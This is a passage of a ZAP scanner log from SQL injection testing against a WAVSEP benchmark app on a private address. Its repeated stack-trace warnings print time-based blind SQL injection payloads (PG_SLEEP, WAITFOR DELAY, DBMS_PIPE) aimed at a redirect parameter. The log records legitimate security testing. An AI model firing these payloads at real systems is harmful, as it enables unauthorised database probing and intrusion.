Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680734 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 3399=(SELECT 3399 FROM PG_SLEEP(5)) AND (9584=9584] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 3399=(SELECT 3399 FROM PG_SLEEP(5)) AND (9584=9584 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680735 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (5466=5466] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (5466=5466 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680736 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680736 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3797=(SELECT 3797 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3797=(SELECT 3797 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680737 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('EigN'='EigN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('EigN'='EigN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680738 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5720=(SELECT 5720 FROM PG_SLEEP(5)) AND ('XWGJ'='XWGJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5720=(SELECT 5720 FROM PG_SLEEP(5)) AND ('XWGJ'='XWGJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680739 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3176=(SELECT 3176 FROM PG_SLEEP(5)) AND 'BEpM'='BEpM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3176=(SELECT 3176 FROM PG_SLEEP(5)) AND 'BEpM'='BEpM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680739 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'yGio'='yGio] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'yGio'='yGio at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680740 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8825=(SELECT 8825 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8825=(SELECT 8825 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680740 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680742 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- MnJI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- MnJI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680742 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4166=(SELECT 4166 FROM PG_SLEEP(5))-- GlEl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4166=(SELECT 4166 FROM PG_SLEEP(5))-- GlEl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680743 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 4994=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(116)||CHR(85)||CHR(97),5) AND (5290=5290] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 4994=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(116)||CHR(85)||CHR(97),5) AND (5290=5290 